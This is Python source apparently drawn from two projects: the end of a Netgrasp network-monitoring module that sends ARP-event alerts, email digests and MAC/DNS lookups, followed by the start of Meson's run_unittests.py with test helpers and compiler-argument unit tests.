configured") return False import ntfy timer = simple_timer.Timer() # only send notifications for configured events ng.db.cursor.execute("SELECT eid, mid, iid, did, timestamp, type, processed FROM event WHERE NOT (processed & 8) AND type IN ("+ ",".join("?"*len(ng.notification["alerts"])) + ")", ng.notification["alerts"]) rows = ng.db.cursor.fetchall() if rows: max_eid = 0 for row in rows: eid, mid, iid, did, timestamp, event, processed = row if eid > max_eid: max_eid = eid if event in ng.notification["alerts"]: details = get_details(did) if not details: ng.debugger.warning("invalid device %d, unable to generate notification") continue active, counter, ip, mac, host_name, custom_name, vendor = details ng.debugger.info("event %s [%d] in %s, generating notification alert", (event, eid, ng.notification["alerts"])) frstseen = first_seen(did) lastseen = first_seen_recently(did) prevseen = previously_seen(did) title = """Netgrasp alert: %s""" % event body = """%s with IP %s [%s], seen %s, previously seen %s, first seen %s""" % \ (pretty.name_did(did), ip, mac, pretty.time_ago(lastseen), pretty.time_ago(prevseen), pretty.time_ago(frstseen)) ntfy.notify(body, title) else: ng.debugger.debug("event %s [%d] NOT in %s", (event, eid, ng.notification["alerts"])) if timer.elapsed() > MAXSECONDS: ng.debugger.debug("processing notifications >%d seconds, aborting", (MAXSECONDS,)) with exclusive_lock.ExclusiveFileLock(ng, 5, "send_notifications, aborting"): ng.db.cursor.execute("UPDATE event SET processed=processed + ? WHERE eid <= ? AND NOT (processed & ?)", (PROCESSED_NOTIFICATION, max_eid, PROCESSED_NOTIFICATION)) ng.db.connection.commit() return with exclusive_lock.ExclusiveFileLock(ng, 5, "send_notifications"): ng.db.cursor.execute("UPDATE event SET processed=processed + ? WHERE eid <= ? AND NOT (processed & ?)", (PROCESSED_NOTIFICATION, max_eid, PROCESSED_NOTIFICATION)) ng.db.connection.commit() except Exception: ng.debugger.dump_exception("send_notifications() caught exception") TALKED_TO_LIMIT = 50 def send_email_alerts(): ng = netgrasp_instance try: ng.debugger.debug("entering send_email_alerts()") if not ng.email["enabled"]: ng.debugger.debug("email disabled") return False if not ng.email["alerts"]: ng.debugger.debug("no email alerts configured") return False day = datetime.datetime.now() - datetime.timedelta(days=1) ng.db.cursor.execute("SELECT eid, mid, iid, did, timestamp, type, processed FROM event WHERE NOT (processed & 1) AND type IN ("+ ",".join("?"*len(ng.email["alerts"])) + ")", ng.email["alerts"]) rows = ng.db.cursor.fetchall() if rows: max_eid = 0 processed_events = 0 duplicate_macs = [] duplicate_ips = [] for row in rows: eid, mid, iid, did, timestamp, event, processed = row ng.debugger.debug("processing event %d for iid[%d] mid[%d] at %s", (eid, iid, mid, timestamp)) if eid > max_eid: max_eid = eid processed_events += 1 # only send emails for configured events if event in ng.email["alerts"]: details = get_details(did) if not details: ng.debugger.warning("invalid device %d, unable to generate alert") continue active, counter, ip, mac, host_name, custom_name, vendor = details if event == EVENT_DUPLICATE_MAC: if mac in duplicate_macs: ng.debugger.debug("event %s [%d], notification email already sent", (event, eid)) continue else: ng.debugger.debug("event %s [%d], first time seeing %s", (event, eid, mac)) duplicate_macs.append(mac) elif event == EVENT_DUPLICATE_IP: if ip in duplicate_macs: ng.debugger.debug("event %s [%d], notification email already sent", (event, eid)) continue else: ng.debugger.debug("event %s [%d], first time seeing %s", (event, eid, ip)) duplicate_ips.append(ip) ng.debugger.info("event %s [%d] in %s, generating notification email", (event, eid, ng.email["alerts"])) frstseen = first_seen(did) frstrequ = first_requested(did) lastseen = last_seen(did) timeseen = time_seen(did) prevseen = previously_seen(did) lastrequ = last_requested(did) ng.db.cursor.execute("SELECT dst_ip, dst_mac FROM arp WHERE src_ip = ? AND timestamp >= ? GROUP BY dst_ip LIMIT ?", (ip, day, TALKED_TO_LIMIT)) peers = ng.db.cursor.fetchall() talked_to_list = [] talked_to_count = 0 if peers: talked_to_count = len(peers) for peer in peers: dst_ip, dst_mac = peer dst_mid, dst_iid, dst_did = get_ids(dst_ip, dst_mac) ng.debugger.debug("ip, mac, mid, iid, did: %s, %s, %s, %s, %s", (dst_ip, dst_mac, dst_mid, dst_iid, dst_did)) talked_to_list.append("""%s (%s)""" % (pretty.name_did(dst_did, dst_ip), dst_ip)) if talked_to_count == TALKED_TO_LIMIT: ng.db.cursor.execute("SELECT COUNT(DISTINCT dst_ip) AS count FROM arp WHERE src_ip = ? AND timestamp >= ?", (ip, day)) proper_count = ng.db.cursor.fetchone() if proper_count: talked_to_count = proper_count[0] devices = active_devices_with_ip(ip) devices_with_ip = [] if devices: for device in devices: list_did, list_ip, list_mac = device devices_with_ip.append("""%s [%s]""" % (pretty.name_did(list_did), list_mac)) devices = active_devices_with_mac(mac) devices_with_mac = [] if devices: for device in devices: list_did, list_ip, list_mac = device devices_with_mac.append("""%s (%s)""" % (pretty.name_did(list_did), list_ip)) devices = devices_requesting_ip(ip, ng.listen["active_timeout"]) devices_requesting = [] if devices: for device in devices: list_did, list_ip, list_mac = device devices_requesting.append("""%s (%s)""" % (pretty.name_did(list_did), list_ip)) email.MailSend(event, 'alert', dict( name=pretty.name_did(did), ip=ip, mac=mac, event_id=eid, vendor=vendor, hostname=host_name, custom_name=custom_name, first_seen=pretty.time_ago(frstseen), last_seen=pretty.time_ago(lastseen), recently_seen_count=counter, time_seen=pretty.time_elapsed(timeseen), previously_seen=pretty.time_ago(prevseen), first_requested=pretty.time_ago(frstrequ), last_requested=pretty.time_ago(lastrequ), previous_ip=previous_ip(did), devices_with_ip=devices_with_ip, devices_with_mac=devices_with_mac, devices_requesting=devices_requesting, active_boolean=active, talked_to_count=talked_to_count, talked_to_list=talked_to_list, event=event )) else: ng.debugger.debug("event %s [%d] NOT in %s", (event, eid, ng.email["alerts"])) with exclusive_lock.ExclusiveFileLock(ng, 5, "send_email_alerts"): ng.db.cursor.execute("UPDATE event SET processed=processed + ? WHERE eid <= ? AND NOT (processed & ?)", (PROCESSED_ALERT, max_eid, PROCESSED_ALERT)) ng.db.connection.commit() ng.debugger.debug("send_email_alerts: processed %d events", (processed_events,)) except Exception: ng.debugger.dump_exception("send_email_alerts() caught exception") # Identify vendor associated with MAC. def mac_lookup(mac): ng = netgrasp_instance try: ng.debugger.debug("entering mac_lookup(%s)", (mac,)) import re import httplib if not re.match("[0-9a-f]{2}([-:])[0-9a-f]{2}(\\1[0-9a-f]{2}){4}$", mac.lower()): fixed_mac = [] pieces = mac.split(":") if not pieces: pieces = mac.split("-") for piece in pieces: if len(piece) == 1: piece = "0"+piece fixed_mac.append(piece) fixed_mac = ":".join(fixed_mac) mac = fixed_mac ng.debugger.debug("Looking up vendor for %s", (mac,)) http = httplib.HTTPConnection("api.macvendors.com", 80) url = """/%s""" % mac http.request("GET", url) response = http.getresponse() if response.status == 200 and response.reason == "OK": vendor = response.read() ng.debugger.debug("identified %s as %s", (mac, vendor)) else: vendor = None ng.debugger.info("failed to identify %s", (mac,)) return vendor except Exception: ng.debugger.dump_exception("mac_lookup() caught exception") def refresh_dns_cache(): ng = netgrasp_instance # @TODO consider retrieving actual TTL from DNS -- for now refresh active devices regularly try: ng.debugger.debug("entering refresh_dns_cache") ttl = datetime.datetime.now() - datetime.timedelta(minutes=15) ng.db.cursor.execute("SELECT host.hid, host.name, activity.did, mac.address, ip.address FROM activity LEFT JOIN ip ON activity.iid = ip.iid LEFT JOIN host ON activity.iid = host.iid LEFT JOIN mac ON ip.mid = mac.mid WHERE activity.active = 1 AND host.updated < ? LIMIT 10", (ttl,)) rows = ng.db.cursor.fetchall() for row in rows: hid, old_name, did, mac, ip = row name = dns_lookup(ip) now = datetime.datetime.now() with exclusive_lock.ExclusiveFileLock(ng, 5, "refresh_dns_cache"): ng.debugger.debug("Refreshing hostname from '%s' to '%s' for %s", (old_name, name, ip)) ng.db.cursor.execute("UPDATE host SET name = ?, updated = ? WHERE hid = ?", (name, now, hid)) ng.db.connection.commit() except Exception: ng.debugger.dump_exception("refresh_dns_cache() caught exception") def dns_lookup(ip): ng = netgrasp_instance try: import socket ng.debugger.debug("entering dns_lookup(%s)", (ip,)) try: host_name, aliaslist, ipaddrlist = socket.gethostbyaddr(ip) ng.debugger.debug("host_name(%s), aliaslist(%s), ipaddrlist(%s)", (host_name, aliaslist, ipaddrlist)) return host_name except Exception as e: host_name = "unknown" ng.debugger.debug("dns_lookup() socket.gethostbyaddr(%s) failed, host_name = %s: %s", (ip, host_name, e)) return host_name except Exception: ng.debugger.dump_exception("dns_lookup() caught exception") # Generates daily and weekly email digests. def send_email_digests(): ng = netgrasp_instance try: ng.debugger.debug("entering send_email_digests()") if not ng.email["enabled"]: ng.debugger.debug("email disabled") return False if not ng.email["digests"]: ng.debugger.debug("no digests configured") return False timer = simple_timer.Timer() now = datetime.datetime.now() # @TODO make sure we validate available digests for digest in ng.email["digests"]: if timer.elapsed() > MAXSECONDS: ng.debugger.debug("processing digests >%d seconds, aborting digest", (MAXSECONDS,)) return if digest == "daily": timestamp_string = "daily_digest_timestamp" future_digest_timestamp = now + datetime.timedelta(days=1) time_period = now - datetime.timedelta(days=1) time_period_description = "24 hours" previous_time_period = now - datetime.timedelta(days=2) elif digest == "weekly": timestamp_string = "weekly_digest_timestamp" future_digest_timestamp = now + datetime.timedelta(weeks=1) time_period = now - datetime.timedelta(weeks=1) time_period_description = "7 days" previous_time_period = now - datetime.timedelta(weeks=2) next_digest_timestamp = ng.db.get_state(timestamp_string, "", True) if not next_digest_timestamp: # first time here, schedule a digest for appropriate time in future ng.db.set_state(timestamp_string, future_digest_timestamp) next_digest_timestamp = future_digest_timestamp if now < next_digest_timestamp: # it's not yet time to send this digest continue # time to send a digest ng.debugger.info("Sending %s digest", (digest,)) ng.db.set_state(timestamp_string, future_digest_timestamp) # how many devices were requested during this time period ng.db.cursor.execute("SELECT COUNT(DISTINCT dst_ip) FROM arp WHERE rid IS NOT NULL AND timestamp >= ? AND timestamp <= ?", (time_period, now)) requested = ng.db.cursor.fetchone() # all devices that were actively seen during this time period ng.db.cursor.execute("SELECT DISTINCT did FROM arp WHERE did IS NOT NULL AND timestamp >= ? AND timestamp <= ?", (time_period, now)) seen = ng.db.cursor.fetchall() # all devices that were actively seen during the previous time period ng.db.cursor.execute("SELECT DISTINCT did FROM arp WHERE did IS NOT NULL AND timestamp >= ? AND timestamp <= ?", (previous_time_period, time_period)) seen_previous = ng.db.cursor.fetchall() new = set(seen) - set(seen_previous) gone_away = set(seen_previous) - set(seen) noisy = [] some_new = False active_devices = [] for unique_seen in seen: did = unique_seen[0] details = get_details(did) if not details: ng.debugger.warning("invalid device %d, not included in digest") continue active, counter, ip, mac, host_name, custom_name, vendor = details ng.db.cursor.execute("SELECT COUNT(DISTINCT(dst_ip)) FROM arp WHERE rid IS NOT NULL AND src_ip = ? AND timestamp >= ? AND timestamp <= ?", (ip, time_period, now)) requests = ng.db.cursor.fetchone() if requests[0] > 10: noisy.append((mac, ip, requests[0], pretty.name_did(did))) if unique_seen in new: active_devices.append("""%s (%s)*""" % (pretty.name_did(did), ip)) some_new = True else: active_devices.append("""%s (%s)""" % (pretty.name_did(did), ip)) if some_new: new_devices_text = "* = not active in the previous " + time_period_description else: new_devices_text = "" noisy_devices_intro = "" noisy_devices = [] if noisy: noisy_devices_intro = "The following devices requested 10 or more IPs:" for noise in noisy: noisy_text = """%s (%s) requested %d IP addresses""" % (noise[3], noise[1], noise[2]) if noise[2] > 100: noisy_text += " (network scan)" elif noise[2] > 50: noisy_text += " (network scan?)" noisy_devices.append(noisy_text) gone_devices_intro = "" gone_devices = [] if gone_away: gone_devices_intro = """The following IPs were not active, but were active the previous %s:""" % time_period_description for gone in gone_away: gone_details = get_details(gone[0]) gone_active, gone_counter, gone_ip, gone_mac, gone_host_name, gone_custom_name, gone_vendor = gone_details gone_devices.append("""%s (%s)""" % (pretty.name_did(gone[0]), gone_ip)) device_breakdown = [] if digest == "daily": rnge = 24 while rnge > 0: lower = now - datetime.timedelta(hours=rnge) rnge = rnge - 1 upper = now - datetime.timedelta(hours=rnge) ng.db.cursor.execute("SELECT DISTINCT did FROM arp WHERE timestamp >= ? AND timestamp < ?", (lower, upper)) distinct = ng.db.cursor.fetchall() device_breakdown.append("""%s: %d""" % (lower.strftime("%I %p, %x"), len(distinct))) elif digest == "weekly": rnge = 7 while rnge > 0: lower = now - datetime.timedelta(days=rnge) rnge = rnge - 1 upper = now - datetime.timedelta(days=rnge) ng.db.cursor.execute("SELECT DISTINCT did FROM arp WHERE timestamp >= ? AND timestamp < ?", (lower, upper)) distinct = ng.db.cursor.fetchall() device_breakdown.append("""%s: %d""" % (lower.strftime("%A, %x"), len(distinct))) ng.debugger.info("Sending %s digest", (digest,)) # @TODO fixme email.MailSend('digest', 'digest', dict( type=digest, time_period=time_period_description, active_devices_count=len(seen), active_devices=active_devices, new_devices_text=new_devices_text, ips_requested=requested[0], noisy_devices_intro=noisy_devices_intro, noisy_devices=noisy_devices, gone_devices_intro=gone_devices_intro, gone_devices=gone_devices, device_breakdown=device_breakdown )) except Exception: ng.debugger.dump_exception("send_email_digests() caught exception") # Don't let the arp or event tables grow too big. def garbage_collection(): ng = netgrasp_instance try: ng.debugger.debug("entering garbage_collection()") if not ng.database["gcenabled"]: ng.db.debugger.debug("garbage collection disabled") return garbage_collection_string = "garbage collection" now = datetime.datetime.now() next_garbage_collection = ng.db.get_state(garbage_collection_string, "", True) if not next_garbage_collection: # perform first garbage collection now next_garbage_collection = now if now < next_garbage_collection: # it's not yet time to send this digest return False ng.debugger.info("performing garbage collection") # schedule next garbage collection ng.db.set_state(garbage_collection_string, now + datetime.timedelta(days=1)) with exclusive_lock.ExclusiveFileLock(ng, 5, "garbage_collection"): # Purge old arp entries. ng.db.cursor.execute("SELECT COUNT(*) FROM arp WHERE timestamp < ?", (now - ng.database["oldest_arp"],)) arp_count = ng.db.cursor.fetchone() ng.db.cursor.execute("DELETE FROM arp WHERE timestamp < ?", (now - ng.database["oldest_arp"],)) # Purge old event entries. ng.db.cursor.execute("SELECT COUNT(*) FROM event WHERE timestamp < ?", (now - ng.database["oldest_event"],)) event_count = ng.db.cursor.fetchone() ng.db.cursor.execute("DELETE FROM event WHERE timestamp < ?", (now - ng.database["oldest_event"],)) ng.db.connection.commit() ng.debugger.debug("deleted %d arp entries older than %s", (arp_count[0], now - ng.database["oldest_arp"])) ng.debugger.debug("deleted %d event entries older than %s", (event_count[0], now - ng.database["oldest_event"])) except Exception: ng.debugger.dump_exception("garbage_collection() caught exception")
run_unittests.py
#!/usr/bin/env python3 # Copyright 2016-2017 The Meson development team # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from mesonbuild.compilers.objc import AppleClangObjCCompiler import time import stat import subprocess import re import json import tempfile import textwrap import os import shutil import sys import unittest import platform import pickle import functools import io import operator import threading import urllib.error import urllib.request import zipfile import hashlib from itertools import chain from unittest import mock from configparser import ConfigParser from contextlib import contextmanager from glob import glob from pathlib import (PurePath, Path) from distutils.dir_util import copy_tree import typing as T import mesonbuild.mlog import mesonbuild.depfile import mesonbuild.dependencies.base import mesonbuild.compilers import mesonbuild.envconfig import mesonbuild.environment import mesonbuild.mesonlib import mesonbuild.coredata import mesonbuild.modules.gnome from mesonbuild.interpreter import Interpreter, ObjectHolder from mesonbuild.ast import AstInterpreter from mesonbuild.mesonlib import ( BuildDirLock, LibType, MachineChoice, PerMachine, Version, is_windows, is_osx, is_cygwin, is_dragonflybsd, is_openbsd, is_haiku, is_sunos, windows_proof_rmtree, python_command, version_compare, split_args, quote_arg, relpath, is_linux, git, GIT ) from mesonbuild.environment import detect_ninja from mesonbuild.mesonlib import MesonException, EnvironmentException from mesonbuild.dependencies import PkgConfigDependency, ExternalProgram import mesonbuild.dependencies.base from mesonbuild.build import Target, ConfigurationData import mesonbuild.modules.pkgconfig from mesonbuild.mtest import TAPParser, TestResult from mesonbuild.wrap.wrap import PackageDefinition, WrapException from run_tests import ( Backend, FakeBuild, FakeCompilerOptions, ensure_backend_detects_changes, exe_suffix, get_backend_commands, get_builddir_target_args, get_fake_env, get_fake_options, get_meson_script, run_configure_inprocess, run_mtest_inprocess ) URLOPEN_TIMEOUT = 5 @contextmanager def chdir(path: str): curdir = os.getcwd() os.chdir(path) try: yield finally: os.chdir(curdir) def get_dynamic_section_entry(fname: str, entry: str) -> T.Optional[str]: if is_cygwin() or is_osx(): raise unittest.SkipTest('Test only applicable to ELF platforms') try: raw_out = subprocess.check_output(['readelf', '-d', fname], universal_newlines=True) except FileNotFoundError: # FIXME: Try using depfixer.py:Elf() as a fallback raise unittest.SkipTest('readelf not found') pattern = re.compile(entry + r': \[(.*?)\]') for line in raw_out.split('\n'): m = pattern.search(line) if m is not None: return str(m.group(1)) return None # The file did not contain the specified entry. def get_soname(fname: str) -> T.Optional[str]: return get_dynamic_section_entry(fname, 'soname') def get_rpath(fname: str) -> T.Optional[str]: raw = get_dynamic_section_entry(fname, r'(?:rpath|runpath)') # Get both '' and None here if not raw: return None # nix/nixos adds a bunch of stuff to the rpath out of necessity that we # don't check for, so clear those final = ':'.join([e for e in raw.split(':') if not e.startswith('/nix')]) return final def is_tarball(): if not os.path.isdir('docs'): return True return False def is_ci(): if 'CI' in os.environ: return True return False def _git_init(project_dir): # If a user has git configuration init.defaultBranch set we want to override that with tempfile.TemporaryDirectory() as d: out = git(['--version'], str(d))[1] if version_compare(mesonbuild.environment.search_version(out), '>= 2.28'): extra_cmd = ['--initial-branch', 'master'] else: extra_cmd = [] subprocess.check_call(['git', 'init'] + extra_cmd, cwd=project_dir, stdout=subprocess.DEVNULL) subprocess.check_call(['git', 'config', 'user.name', 'Author Person'], cwd=project_dir) subprocess.check_call(['git', 'config', 'user.email', 'teh_coderz@example.com'], cwd=project_dir) subprocess.check_call('git add *', cwd=project_dir, shell=True, stdout=subprocess.DEVNULL) subprocess.check_call(['git', 'commit', '-a', '-m', 'I am a project'], cwd=project_dir, stdout=subprocess.DEVNULL) @functools.lru_cache() def is_real_gnu_compiler(path): ''' Check if the gcc we have is a real gcc and not a macOS wrapper around clang ''' if not path: return False out = subprocess.check_output([path, '--version'], universal_newlines=True, stderr=subprocess.STDOUT) return 'Free Software Foundation' in out def skipIfNoExecutable(exename): ''' Skip this test if the given executable is not found. ''' def wrapper(func): @functools.wraps(func) def wrapped(*args, **kwargs): if shutil.which(exename) is None: raise unittest.SkipTest(exename + ' not found') return func(*args, **kwargs) return wrapped return wrapper def skipIfNoPkgconfig(f): ''' Skip this test if no pkg-config is found, unless we're on CI. This allows users to run our test suite without having pkg-config installed on, f.ex., macOS, while ensuring that our CI does not silently skip the test because of misconfiguration. Note: Yes, we provide pkg-config even while running Windows CI ''' @functools.wraps(f) def wrapped(*args, **kwargs): if not is_ci() and shutil.which('pkg-config') is None: raise unittest.SkipTest('pkg-config not found') return f(*args, **kwargs) return wrapped def skipIfNoPkgconfigDep(depname): ''' Skip this test if the given pkg-config dep is not found, unless we're on CI. ''' def wrapper(func): @functools.wraps(func) def wrapped(*args, **kwargs): if not is_ci() and shutil.which('pkg-config') is None: raise unittest.SkipTest('pkg-config not found') if not is_ci() and subprocess.call(['pkg-config', '--exists', depname]) != 0: raise unittest.SkipTest('pkg-config dependency {} not found.'.format(depname)) return func(*args, **kwargs) return wrapped return wrapper def skip_if_no_cmake(f): ''' Skip this test if no cmake is found, unless we're on CI. This allows users to run our test suite without having cmake installed on, f.ex., macOS, while ensuring that our CI does not silently skip the test because of misconfiguration. ''' @functools.wraps(f) def wrapped(*args, **kwargs): if not is_ci() and shutil.which('cmake') is None: raise unittest.SkipTest('cmake not found') return f(*args, **kwargs) return wrapped def skip_if_not_language(lang): def wrapper(func): @functools.wraps(func) def wrapped(*args, **kwargs): try: env = get_fake_env() f = getattr(env, 'detect_{}_compiler'.format(lang)) f(MachineChoice.HOST) except EnvironmentException: raise unittest.SkipTest('No {} compiler found.'.format(lang)) return func(*args, **kwargs) return wrapped return wrapper def skip_if_env_set(key): ''' Skip a test if a particular env is set, except when running under CI ''' def wrapper(func): @functools.wraps(func) def wrapped(*args, **kwargs): old = None if key in os.environ: if not is_ci(): raise unittest.SkipTest('Env var {!r} set, skipping'.format(key)) old = os.environ.pop(key) try: return func(*args, **kwargs) finally: if old is not None: os.environ[key] = old return wrapped return wrapper def skip_if_not_base_option(feature): """Skip tests if The compiler does not support a given base option. for example, ICC doesn't currently support b_sanitize. """ def actual(f): @functools.wraps(f) def wrapped(*args, **kwargs): env = get_fake_env() cc = env.detect_c_compiler(MachineChoice.HOST) if feature not in cc.base_options: raise unittest.SkipTest( '{} not available with {}'.format(feature, cc.id)) return f(*args, **kwargs) return wrapped return actual @contextmanager def temp_filename(): '''A context manager which provides a filename to an empty temporary file. On exit the file will be deleted. ''' fd, filename = tempfile.mkstemp() os.close(fd) try: yield filename finally: try: os.remove(filename) except OSError: pass @contextmanager def no_pkgconfig(): ''' A context manager that overrides shutil.which and ExternalProgram to force them to return None for pkg-config to simulate it not existing. ''' old_which = shutil.which old_search = ExternalProgram._search def new_search(self, name, search_dir): if name == 'pkg-config': return [None] return old_search(self, name, search_dir) def new_which(cmd, *kwargs): if cmd == 'pkg-config': return None return old_which(cmd, *kwargs) shutil.which = new_which ExternalProgram._search = new_search try: yield finally: shutil.which = old_which ExternalProgram._search = old_search class InternalTests(unittest.TestCase): def test_version_number(self): searchfunc = mesonbuild.environment.search_version self.assertEqual(searchfunc('foobar 1.2.3'), '1.2.3') self.assertEqual(searchfunc('1.2.3'), '1.2.3') self.assertEqual(searchfunc('foobar 2016.10.28 1.2.3'), '1.2.3') self.assertEqual(searchfunc('2016.10.28 1.2.3'), '1.2.3') self.assertEqual(searchfunc('foobar 2016.10.128'), '2016.10.128') self.assertEqual(searchfunc('2016.10.128'), '2016.10.128') self.assertEqual(searchfunc('2016.10'), '2016.10') self.assertEqual(searchfunc('2016.10 1.2.3'), '1.2.3') self.assertEqual(searchfunc('oops v1.2.3'), '1.2.3') self.assertEqual(searchfunc('2016.oops 1.2.3'), '1.2.3') self.assertEqual(searchfunc('2016.x'), 'unknown version') def test_mode_symbolic_to_bits(self): modefunc = mesonbuild.mesonlib.FileMode.perms_s_to_bits self.assertEqual(modefunc('---------'), 0) self.assertEqual(modefunc('r--------'), stat.S_IRUSR) self.assertEqual(modefunc('---r-----'), stat.S_IRGRP) self.assertEqual(modefunc('------r--'), stat.S_IROTH) self.assertEqual(modefunc('-w-------'), stat.S_IWUSR) self.assertEqual(modefunc('----w----'), stat.S_IWGRP) self.assertEqual(modefunc('-------w-'), stat.S_IWOTH) self.assertEqual(modefunc('--x------'), stat.S_IXUSR) self.assertEqual(modefunc('-----x---'), stat.S_IXGRP) self.assertEqual(modefunc('--------x'), stat.S_IXOTH) self.assertEqual(modefunc('--S------'), stat.S_ISUID) self.assertEqual(modefunc('-----S---'), stat.S_ISGID) self.assertEqual(modefunc('--------T'), stat.S_ISVTX) self.assertEqual(modefunc('--s------'), stat.S_ISUID | stat.S_IXUSR) self.assertEqual(modefunc('-----s---'), stat.S_ISGID | stat.S_IXGRP) self.assertEqual(modefunc('--------t'), stat.S_ISVTX | stat.S_IXOTH) self.assertEqual(modefunc('rwx------'), stat.S_IRWXU) self.assertEqual(modefunc('---rwx---'), stat.S_IRWXG) self.assertEqual(modefunc('------rwx'), stat.S_IRWXO) # We could keep listing combinations exhaustively but that seems # tedious and pointless. Just test a few more. self.assertEqual(modefunc('rwxr-xr-x'), stat.S_IRWXU | stat.S_IRGRP | stat.S_IXGRP | stat.S_IROTH | stat.S_IXOTH) self.assertEqual(modefunc('rw-r--r--'), stat.S_IRUSR | stat.S_IWUSR | stat.S_IRGRP | stat.S_IROTH) self.assertEqual(modefunc('rwsr-x---'), stat.S_IRWXU | stat.S_ISUID | stat.S_IRGRP | stat.S_IXGRP) def test_compiler_args_class_none_flush(self): cc = mesonbuild.compilers.ClangCCompiler([], 'fake', MachineChoice.HOST, False, mock.Mock()) a = cc.compiler_args(['-I.']) #first we are checking if the tree construction deduplicates the correct -I argument a += ['-I..'] a += ['-I./tests/'] a += ['-I./tests2/'] #think this here as assertion, we cannot apply it, otherwise the CompilerArgs would already flush the changes: # assertEqual(a, ['-I.', '-I./tests2/', '-I./tests/', '-I..', '-I.']) a += ['-I.'] a += ['-I.', '-I./tests/'] self.assertEqual(a, ['-I.', '-I./tests/', '-I./tests2/', '-I..']) #then we are checking that when CompilerArgs already have a build container list, that the deduplication is taking the correct one a += ['-I.', '-I./tests2/'] self.assertEqual(a, ['-I.', '-I./tests2/', '-I./tests/', '-I..']) def test_compiler_args_class_d(self): d = mesonbuild.compilers.DmdDCompiler([], 'fake', MachineChoice.HOST, 'info', 'arch') # check include order is kept when deduplicating a = d.compiler_args(['-Ifirst', '-Isecond', '-Ithird']) a += ['-Ifirst'] self.assertEqual(a, ['-Ifirst', '-Isecond', '-Ithird']) def test_compiler_args_class_clike(self): cc = mesonbuild.compilers.ClangCCompiler([], 'fake', MachineChoice.HOST, False, mock.Mock()) # Test that empty initialization works a = cc.compiler_args() self.assertEqual(a, []) # Test that list initialization works a = cc.compiler_args(['-I.', '-I..']) self.assertEqual(a, ['-I.', '-I..']) # Test that there is no de-dup on initialization self.assertEqual(cc.compiler_args(['-I.', '-I.']), ['-I.', '-I.']) ## Test that appending works a.append('-I..') self.assertEqual(a, ['-I..', '-I.']) a.append('-O3') self.assertEqual(a, ['-I..', '-I.', '-O3']) ## Test that in-place addition works a += ['-O2', '-O2'] self.assertEqual(a, ['-I..', '-I.', '-O3', '-O2', '-O2']) # Test that removal works a.remove('-O2') self.assertEqual(a, ['-I..', '-I.', '-O3', '-O2']) # Test that de-dup happens on addition a += ['-Ifoo', '-Ifoo'] self.assertEqual(a, ['-Ifoo', '-I..', '-I.', '-O3', '-O2']) # .extend() is just +=, so we don't test it ## Test that addition works # Test that adding a list with just one old arg works and yields the same array a = a + ['-Ifoo'] self.assertEqual(a, ['-Ifoo', '-I..', '-I.', '-O3', '-O2']) # Test that adding a list with one arg new and one old works a = a + ['-Ifoo', '-Ibaz'] self.assertEqual(a, ['-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2']) # Test that adding args that must be prepended and appended works a = a + ['-Ibar', '-Wall'] self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2', '-Wall']) ## Test that reflected addition works # Test that adding to a list with just one old arg works and yields the same array a = ['-Ifoo'] + a self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2', '-Wall']) # Test that adding to a list with just one new arg that is not pre-pended works a = ['-Werror'] + a self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Werror', '-O3', '-O2', '-Wall']) # Test that adding to a list with two new args preserves the order a = ['-Ldir', '-Lbah'] + a self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Ldir', '-Lbah', '-Werror', '-O3', '-O2', '-Wall']) # Test that adding to a list with old args does nothing a = ['-Ibar', '-Ibaz', '-Ifoo'] + a self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Ldir', '-Lbah', '-Werror', '-O3', '-O2', '-Wall']) ## Test that adding libraries works l = cc.compiler_args(['-Lfoodir', '-lfoo']) self.assertEqual(l, ['-Lfoodir', '-lfoo']) # Adding a library and a libpath appends both correctly l += ['-Lbardir', '-lbar'] self.assertEqual(l, ['-Lbardir', '-Lfoodir', '-lfoo', '-lbar']) # Adding the same library again does nothing l += ['-lbar'] self.assertEqual(l, ['-Lbardir', '-Lfoodir', '-lfoo', '-lbar']) ## Test that 'direct' append and extend works l = cc.compiler_args(['-Lfoodir', '-lfoo']) self.assertEqual(l, ['-Lfoodir', '-lfoo']) # Direct-adding a library and a libpath appends both correctly l.extend_direct(['-Lbardir', '-lbar']) self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar']) # Direct-adding the same library again still adds it l.append_direct('-lbar') self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar']) # Direct-adding with absolute path deduplicates l.append_direct('/libbaz.a') self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a']) # Adding libbaz again does nothing l.append_direct('/libbaz.a') self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a']) def test_compiler_args_class_gnuld(self): ## Test --start/end-group linker = mesonbuild.linkers.GnuBFDDynamicLinker([], MachineChoice.HOST, '-Wl,', []) gcc = mesonbuild.compilers.GnuCCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock(), linker=linker) ## Ensure that the fake compiler is never called by overriding the relevant function gcc.get_default_include_dirs = lambda: ['/usr/include', '/usr/share/include', '/usr/local/include'] ## Test that 'direct' append and extend works l = gcc.compiler_args(['-Lfoodir', '-lfoo']) self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group']) # Direct-adding a library and a libpath appends both correctly l.extend_direct(['-Lbardir', '-lbar']) self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-Wl,--end-group']) # Direct-adding the same library again still adds it l.append_direct('-lbar') self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '-Wl,--end-group']) # Direct-adding with absolute path deduplicates l.append_direct('/libbaz.a') 